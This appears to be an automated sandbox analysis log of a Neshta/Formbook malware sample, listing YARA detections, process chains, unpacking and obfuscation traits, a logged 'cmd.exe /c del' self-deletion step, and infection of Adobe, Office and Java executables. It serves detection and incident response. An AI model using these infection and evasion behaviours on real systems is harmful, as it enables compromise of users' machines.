          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.svchost.com.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@15/122@1/1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Roaming\hbqilrpJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_01
          Source: C:\Windows\svchost.comMutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5 @
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490Jump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vi0EwpbUht.exeMetadefender: Detection: 91%
          Source: vi0EwpbUht.exeReversingLabs: Detection: 100%
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile read: C:\Users\user\Desktop\vi0EwpbUht.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\vi0EwpbUht.exe 'C:\Users\user\Desktop\vi0EwpbUht.exe'
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe'
          Source: C:\Windows\svchost.comProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Windows\svchost.comProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: netstat.pdbGCTL source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: vi0EwpbUht.exe, 00000002.00000003.327241678.0000000003140000.00000004.00000001.sdmp, vi0EwpbUht.exe, 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, elxhan.exe, 00000007.00000002.565127229.0000000000B0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vi0EwpbUht.exe, elxhan.exe, NETSTAT.EXE, help.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeUnpacked PE file: 3.2.vi0EwpbUht.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeUnpacked PE file: 7.2.elxhan.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040802C push 00408052h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004070A4 push 004070D0h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004041D8 push 00404204h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004041A0 push 004041CCh; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404256 push 00404284h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404258 push 00404284h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404210 push 0040423Ch; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004042C8 push 004042F4h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404290 push 004042BCh; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404370 push 0040439Ch; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404300 push 0040432Ch; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404338 push 00404364h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004043E0 push 0040440Ch; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004043A8 push 004043D4h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00410778 push 00406D36h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040D7C0 push 00403D79h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040D9F0 push 00403F84h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DA28 push 00403FBCh; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00411AC4 push 00408052h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00410B3C push 004070D0h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DC70 push 00404204h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DC38 push 004041CCh; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00406CE0 push 00406D36h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DCEE push 00404284h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DCF0 push 00404284h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DCA8 push 0040423Ch; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DD60 push 004042F4h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00403D28 push 00403D79h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DD28 push 004042BCh; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DDD0 push 00404364h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040DD98 push 0040432Ch; ret

          Persistence and Installation Behavior:

          barindex
          Yara detected NeshtaShow sources
          Source: Yara matchFile source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara matchFile source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Drops PE files with a suspicious file extensionShow sources
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Windows\svchost.com
          Drops executable to a common third party application directoryShow sources
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile written: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile written: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Drops executables to the windows directory (C:\Windows) and starts themShow sources
          Source: C:\Windows\explorer.exeExecutable created and started: C:\Windows\svchost.com
          Infects executable files (exe, dll, sys, html)Show sources
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to behavior
